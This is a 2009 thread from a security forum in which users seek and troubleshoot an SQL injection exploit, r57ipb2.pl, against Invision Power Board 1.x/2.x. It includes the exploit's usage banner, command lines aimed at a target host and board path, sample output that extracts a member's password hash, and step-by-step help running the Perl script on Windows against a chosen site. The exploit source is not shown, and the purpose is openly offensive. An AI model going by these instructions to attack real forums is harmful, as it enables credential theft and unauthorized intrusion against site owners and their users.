|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 59
Members: 0
Total: 59
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
IPB 1.3? |
|
Posted: Thu Sep 24, 2009 11:31 am |
|
|
tox1c |
Active user |
|
|
Joined: Sep 22, 2009 |
Posts: 41 |
|
|
|
|
|
|
|
Is there a working up to date SQL Injection Exploit for IPB v1.3.
I cant seem to find a working one.
I tried the one 2.3.5 by waraxe but it didnt work.
? |
|
|
|
|
Posted: Thu Sep 24, 2009 6:33 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Search in threads.I give exploit for ipb 1.3 final |
|
|
|
|
Posted: Thu Sep 24, 2009 9:23 pm |
|
|
tox1c |
Active user |
|
|
Joined: Sep 22, 2009 |
Posts: 41 |
|
|
|
|
|
|
|
ive searched but cant find |
|
|
|
|
Posted: Fri Sep 25, 2009 1:03 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
Posted: Fri Sep 25, 2009 4:27 pm |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
thats saved as a pl right? its executed via perl. I know that, however i cant figure out exactly how to use it. Do you have to modify the code according to your needs before executing it prompts you to input board URL and all that after you execute it.
Thanks. |
|
|
|
|
Posted: Fri Sep 25, 2009 6:02 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
I think this is write on english:
Code: | ## r57ipb2.pl blah.com /ipb13/ 1 0 <-------------------
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1 <----------------------------
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ] |
|
|
|
|
|
|
|
|
|
Posted: Sat Sep 26, 2009 10:13 am |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
okay, lets say the target board is myass.com/forum/ so i tried by changing that to this
## r57ipb2.pl myass.com /forum/ 1 0 <-------------------
## [~] SERVER : myass.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl myass.com /forum/ 1 1 <----------------------------
## [~] SERVER : myass.com
## [~] PATH : /forum/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
but after executing it from command.exe i still get this
Code: | Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru |
So i really dont know what im doing wrong. That r57ipb2.pl is afile i have to have in order for this script to work? |
|
|
|
|
|
|
|
|
Posted: Sat Sep 26, 2009 3:03 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Save script on the PC.Call him myscript.pl
I think you us windows
Start--->run-->cmd OK
In command prompt type
myscript.pl myass.com /forum/ 1 0
You need to install Perl on the PC. |
|
|
|
|
Posted: Sat Sep 26, 2009 3:58 pm |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
Thank you. That was a great explanation. I finally got it to work, however it says [failed]. Im testing it with a 1.2 of my own so its not patched or anything.
Thank you for your time. |
|
|
|
|
|
|
|
|
Posted: Sun Sep 27, 2009 1:45 am |
|
|
Poison |
Advanced user |
|
|
Joined: Jul 30, 2008 |
Posts: 126 |
|
|
|
|
|
|
|
i get this error when trying to execute the exploit in CMD
C:\Perl>perl hi.pl
Bareword found where operator expected at hi.pl line 44, near ")Sad'password"
(Missing operator before Sad'password?)
String found where operator expected at hi.pl line 48, near "$request = '"
(Might be a runaway multi-line '' string starting on line 44)
(Missing semicolon on previous line?)
Bareword found where operator expected at hi.pl line 48, near "$request = 'http"
(Missing operator before http?)
Number found where operator expected at hi.pl line 60, near "IPB 2."
(Might be a runaway multi-line '' string starting on line 4
(Do you need to predeclare IPB?)
Number found where operator expected at hi.pl line 60, near "IPB 1."
(Do you need to predeclare IPB?)
Bareword found where operator expected at hi.pl line 77, near "print (($target)?
('MEMBER_LOGIN_KEY"
(Might be a runaway multi-line '' string starting on line 60)
(Do you need to predeclare print?)
Bareword found where operator expected at hi.pl line 77, near "')Sad'PASSWORD"
(Missing operator before PASSWORD?)
syntax error at hi.pl line 44, near ")Sad'password"
Can't find string terminator "'" anywhere before EOF at hi.pl line 77. |
|
|
|
|
|
|
|
|
Posted: Sun Sep 27, 2009 11:26 am |
|
|
nuker |
Active user |
|
|
Joined: Aug 16, 2009 |
Posts: 39 |
|
|
|
|
|
|
|
if you copied it directly from the board is most likely the code its messed up because of the smilies. So try to get the original one or remove the smilies yourself (such as Sad and Cool) and then it will work. |
|
|
|
|
Posted: Mon Sep 28, 2009 10:39 am |
|
|
PJG |
Beginner |
|
|
Joined: Sep 28, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
When I try this it says:
syntax error at C:\scriptname.pl line 38, next char )
"use" not allowed in expression at C:\bruteipb.pl line 38, at end of line
Execution of C:\scriptname.pl aborted due to compilation errors.
It's referring to this line:
use IO::Socket;
what can I do about this? |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|